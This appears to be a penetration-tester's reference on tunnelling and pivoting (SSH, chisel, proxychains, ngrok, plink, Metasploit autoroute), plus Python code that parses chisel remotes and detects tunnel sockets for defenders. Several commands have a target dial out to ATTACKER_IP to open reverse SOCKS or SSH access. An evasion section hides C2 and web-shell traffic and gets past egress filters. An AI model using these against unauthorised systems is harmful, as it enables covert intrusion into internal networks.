For C2-integrated pivoting (Cobalt Strike/Sliver SOCKS, PortBender, Ligolo-ng in a campaign context), see c. Lateral Movement & Pivoting.


SSH Tunnels

# Local port forward through a bastion: your 127.0.0.1:6443 is carried over the
# SSH session to jumpserver, which connects on to finaltarget:targetport
ssh -L 127.0.0.1:6443:finaltarget:targetport user@jumpserver

# Forward local 8080 to port 80 on the web server you are logging into
ssh -L 8080:webserver:80 webserver

# General format (without an explicit bind address, -L listens on loopback only)
ssh -L local_port:remote_address:remote_port username@server.com

# Reverse tunnel: target.local listens on 43022 and forwards it back to your local port 22
ssh -R 43022:localhost:22 user@target.local

Chisel

https://github.com/jpillora/chisel

Reverse SOCKS Proxy

The client (target) connects out to the server (attacker), giving the attacker a SOCKS pivot into the target network.

# --- Attacker ---
# Listens for a reverse connection on port 9999
chisel server -p 9999 --reverse
 
# --- Target ---
# Connects to attacker, 'R:socks' tells the server to open a SOCKS proxy
chisel client ATTACKER_IP:9999 R:socks
 
# --- Attacker Usage ---
# A SOCKS5 proxy is now running on your machine at 127.0.0.1:1080.
# Add 'socks5 127.0.0.1 1080' to /etc/proxychains4.conf
#
# proxychains nmap -sT 10.1.1.10 -p 80,445

# Authentication: with --auth only a client presenting the same credentials can use
# the listener, so anyone else who discovers the open port cannot ride the tunnel
# --- Attacker ---
# Listens on 9999 in reverse mode and requires --auth
chisel server -p 9999 --reverse --auth "chisel-user:SecurePass123!"
 
# --- Target ---
# Connects to attacker with the correct --auth string, requests SOCKS proxy
chisel client --auth "chisel-user:SecurePass123!" ATTACKER_IP:9999 R:socks
 
# --- Attacker Usage ---
# Proxy is now running on 127.0.0.1:1080

Forward SOCKS Proxy

Useful if you have direct network access to the target. Your attacker machine connects in to the target, opening a SOCKS proxy on your machine.

# --- Target ---
# Listens for a forward connection on port 9999; --socks5 is required
# before connecting clients may request the 'socks' remote
chisel server -p 9999 --socks5
 
# --- Attacker ---
# Connects to target, 'socks' opens a local SOCKS proxy at 127.0.0.1:1080
chisel client TARGET_IP:9999 socks
 
# --- Attacker Usage ---
# A SOCKS5 proxy is now running on your machine at 127.0.0.1:1080.
#
# proxychains curl http://10.1.1.20

Reverse Port Forward

The target connects out to your attacker machine, forwarding one of its local ports (e.g., SSH) to a port on your machine.

# --- Attacker ---
# Listens for a reverse connection on port 9999
chisel server -p 9999 --reverse

# --- Target ---
# Connects to attacker, tells server to listen on port 4444
# and forward all traffic to the client's localhost:22
# (a reverse remote binds 0.0.0.0 on the server by default;
# use R:127.0.0.1:4444:localhost:22 to keep it loopback-only)
chisel client ATTACKER_IP:9999 R:4444:localhost:22
 
# --- Attacker Usage ---
# You can now SSH to the target by connecting to your *own* local port 4444
#
# ssh user@127.0.0.1 -p 4444

Forward Port Forward

Your attacker machine connects in to the target and forwards a local port (e.g., 8080) to an internal service on the target's network.

# --- Target ---
# Listens for a forward connection on port 9999
chisel server -p 9999

# --- Attacker ---
# Connects to target and listens on local 8080, forwarding traffic
# to 10.1.1.10:80 via the target. Chisel remotes have no 'L:' prefix:
# the plain form is a forward, and the leading 127.0.0.1 keeps the
# listener off your other interfaces (the default bind is 0.0.0.0)
chisel client TARGET_IP:9999 127.0.0.1:8080:10.1.1.10:80
 
# --- Attacker Usage ---
# Open your local browser to http://127.0.0.1:8080
# to access the internal web server at 10.1.1.10:80

UDP Port Forward

The target connects out to your attacker machine to forward an internal UDP service (like DNS).

# --- Attacker ---
# No special server flag: UDP is selected per remote on the client side
chisel server -p 9999 --reverse

# --- Target ---
# The /udp suffix marks the remote as UDP
# Forwards attacker's UDP 5353 to internal DNS server 10.1.1.5:53
chisel client ATTACKER_IP:9999 R:5353:10.1.1.5:53/udp
 
# --- Attacker Usage ---
# You can now query the internal DNS server via your local port 5353
#
# dig @127.0.0.1 -p 5353 internal.corp.local

Multi-hop Pivot (Reverse SOCKS)

Chains a SOCKS proxy from Pivot 2 (deep network) through Pivot 1 (DMZ) to your Attacker machine.

# Goal: Attacker <--> Pivot 1 <--> Pivot 2 --> Internal Network

# --- On Attacker ---
# Listens for Pivot 1 on port 9999
chisel server -p 9999 --reverse

# --- On Pivot 1 ---
# 1. Connects OUT to Attacker (ATTACKER_IP)
# 2. Tells Attacker to listen on port 8000
# 3. Forwards traffic from Attacker:8000 to its OWN 127.0.0.1:1080,
#    which is where the SOCKS proxy requested by Pivot 2 will appear
chisel client ATTACKER_IP:9999 R:8000:127.0.0.1:1080

# 4. Also runs a server to listen IN from Pivot 2
chisel server -p 8001 --reverse

# --- On Pivot 2 ---
# Connects OUT to Pivot 1's server on port 8001 (PIVOT1_IP, not loopback:
# Pivot 2 is a different host)
# 'R:socks' tells Pivot 1's server to open a SOCKS proxy on Pivot 1's 127.0.0.1:1080
chisel client PIVOT1_IP:8001 R:socks
 
# --- Attacker Usage ---
# The SOCKS proxy from Pivot 2 is now chained back and accessible
# on your Attacker machine at 127.0.0.1:8000
#
# Update /etc/proxychains4.conf to use: socks5 127.0.0.1 8000
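Every chisel command above hinges on the syntax of the "remote" argument, and its defaults (which side listens, which address it binds, 127.0.0.1:1080 for socks) decide how exposed a pivot is. The decoder below is an added example, not code from this page or from the chisel project; it follows chisel's documented grammar `[R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/<protocol>]`, and the `Remote` class, its field names and `decode_remote` are this example's own.

```python
import re
from dataclasses import dataclass

@dataclass
class Remote:  # class and field names are this example's own
    reverse: bool = False   # 'R:' prefix: the listener opens on the server side
    socks: bool = False     # 'socks' in place of remote-host:remote-port
    protocol: str = "tcp"   # '/udp' suffix selects UDP
    local_host: str = ""
    local_port: str = ""
    remote_host: str = ""
    remote_port: str = ""

def is_port(s):
    return s.isdigit() and 0 < int(s) <= 65535

def decode_remote(spec):
    """Decode [R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/<protocol>].
    Fields are consumed from the right, so a stray leading token such as 'L:' or
    'udp:' becomes the local bind host rather than acting as a mode switch."""
    r = Remote()
    if spec.startswith("R:"):
        r.reverse, spec = True, spec[2:]
    if "/" in spec:
        spec, r.protocol = spec.rsplit("/", 1)
        if r.protocol not in ("tcp", "udp"):
            raise ValueError(f"unknown protocol: {r.protocol}")
    parts = re.findall(r"\[[^\[\]]+\]|[^\[\]:]+", spec)  # keep [ipv6] literals whole
    for i in range(len(parts) - 1, -1, -1):
        p = parts[i]
        if i == len(parts) - 1 and p == "socks":
            r.socks = True
        elif not r.socks and not r.remote_port:
            if not is_port(p):
                raise ValueError(f"remote port required in: {spec}")
            r.remote_port = p
        elif not r.socks and not r.remote_host and not is_port(p):
            r.remote_host = p
        elif not r.local_port and is_port(p):
            r.local_port = p
        elif not r.local_host:
            r.local_host = p
        else:
            raise ValueError(f"invalid remote: {spec}")
    if r.socks:  # documented socks default: loopback only
        r.local_host, r.local_port = r.local_host or "127.0.0.1", r.local_port or "1080"
    else:        # others bind all interfaces; remote-host 0.0.0.0 = the dialing side's own host
        r.local_host, r.local_port = r.local_host or "0.0.0.0", r.local_port or r.remote_port
        r.remote_host = r.remote_host or "0.0.0.0"
    return r
```

Feeding it the page's own remotes shows, for instance, that `R:4444:localhost:22` binds 0.0.0.0 on the server while `R:socks` stays on 127.0.0.1:1080.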

Proxychains

https://github.com/haad/proxychains

# Configure /etc/proxychains.conf to use the SOCKS5 proxy
socks5 127.0.0.1 1080

# Tunnel any tool through whatever SOCKS proxy is configured (Tor, chisel, Metasploit's socks_proxy)
# nmap needs -sT -Pn: SYN scans and ICMP host discovery cannot traverse a SOCKS proxy
proxychains nmap -sT -Pn -p 80 target.com
proxychains curl http://example.com

Dev Tunnel (Microsoft Azure)

https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/get-started?tabs=windows

# Requires the devtunnel CLI and a Microsoft account login
devtunnel user login
# Host local port 8080 on a tunnel that anyone holding the URL can reach
devtunnel host -p 8080 --allow-anonymous

Ngrok

https://ngrok.com/

# Expose local HTTP server on port 8080 to public internet
ngrok http 8080
 
# Forward TCP port (e.g., SSH)
ngrok tcp 22

srelay

https://github.com/hirochachacha/srelay

# Simple SOCKS4 proxy
srelay -i 127.0.0.1 -p 1080
 
# Use with proxychains
proxychains -f proxychains.conf curl http://target.com

Plink (PuTTY)

# Create reverse tunnel (remote forwards a port back to you)
plink.exe -R 9999:localhost:22 user@remotehost
 
# Forward local port to remote
plink.exe -L 8080:localhost:80 user@remotehost

Metasploit Tunneling (AutoRoute & Socks Proxy)

# After Meterpreter session is open
run autoroute -s 192.168.1.0/24
 
# Set up SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
 
# Use with proxychains or browser
proxychains curl http://internal.host

Tunneling for Evasion

# Obfuscate C2 and pivot traffic through encrypted or alternate channels:
 
# Use `chisel` in reverse mode with TLS
chisel server --tls-cert cert.pem --tls-key key.pem -p 9999 --reverse
 
# Use `socat` to wrap arbitrary traffic in TLS
# (verify=0 disables certificate verification, so the far end is not authenticated)
socat TCP-LISTEN:443,reuseaddr,fork OPENSSL:targethost:4444,verify=0
 
# SSH over non-standard ports (bypass egress filters)
ssh -p 443 -L 8080:targethost:80 user@host
 
# Ngrok to tunnel web shells or C2 traffic
ngrok http 8080
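From the defender's side, every tunnel on this page leaves a socket signature on the pivot host: a listener owned by the tunnel binary (forward or SOCKS mode) or an outbound connection from it (reverse mode), and the TLS and port-443 variants in this section do not change that. The triage script below is an added example, not from the page or any tool it lists; the `ss -tnpa` sample, the tool list and the function name are constructed assumptions.

```python
import re

# Constructed sample of `ss -tnpa` output (not taken from the page); with -a the
# State column is present because listening and established sockets are both shown.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
LISTEN 0      128    127.0.0.1:1080      0.0.0.0:*          users:(("chisel",pid=4242,fd=7))
LISTEN 0      128    0.0.0.0:8080        0.0.0.0:*          users:(("chisel",pid=4242,fd=9))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=811,fd=3))
LISTEN 0      128    127.0.0.1:4444      0.0.0.0:*          users:(("ssh",pid=4310,fd=4))
ESTAB  0      0      10.1.1.10:51234     203.0.113.5:9999   users:(("chisel",pid=4242,fd=3))
ESTAB  0      0      10.1.1.10:51240     10.1.1.20:443      users:(("firefox",pid=2001,fd=60))
ESTAB  0      0      10.1.1.10:51300     198.51.100.7:443   users:(("socat",pid=5150,fd=5))
"""

# Binaries the page uses to build tunnels. "ssh" is the client, not "sshd":
# an ssh *client* that owns a listening socket is running -L or -D forwarding.
TUNNEL_TOOLS = {"chisel", "ssh", "plink", "plink.exe", "ngrok", "socat", "srelay"}

LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+?):(?P<lport>\d+|\*)\s+"
    r"(?P<raddr>\S+?):(?P<rport>\d+|\*)"
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)

def find_tunnel_sockets(ss_output):
    """Return (kind, process, pid, local, peer) tuples for sockets that look like pivots.

    Flags a LISTEN socket owned by a tunnel binary (a forward or SOCKS endpoint; a
    0.0.0.0 bind means every host on the segment can use it) and an ESTAB socket from
    a tunnel binary to a non-loopback peer, which is how reverse mode looks from the
    inside (the client dials out to ATTACKER_IP:9999).
    """
    findings = []
    for line in ss_output.splitlines()[1:]:          # skip the header row
        m = LINE_RE.match(line)
        if not m or m["proc"] not in TUNNEL_TOOLS:   # proc is None when ss lacks -p rights
            continue
        local, peer = f'{m["laddr"]}:{m["lport"]}', f'{m["raddr"]}:{m["rport"]}'
        if m["state"] == "LISTEN":
            scope = "loopback" if m["laddr"] in ("127.0.0.1", "[::1]") else "exposed"
            findings.append((f"{scope} tunnel listener", m["proc"], int(m["pid"]), local, peer))
        elif m["state"] == "ESTAB" and not m["raddr"].startswith("127."):
            findings.append(("outbound tunnel connection", m["proc"], int(m["pid"]), local, peer))
    return findings

if __name__ == "__main__":
    for finding in find_tunnel_sockets(SAMPLE_SS):
        print(" | ".join(str(f) for f in finding))
```

On the sample it reports the loopback SOCKS listener, the exposed 0.0.0.0:8080 forward, the ssh client's -L listener, and the chisel and socat processes dialling out, while ignoring sshd and the browser.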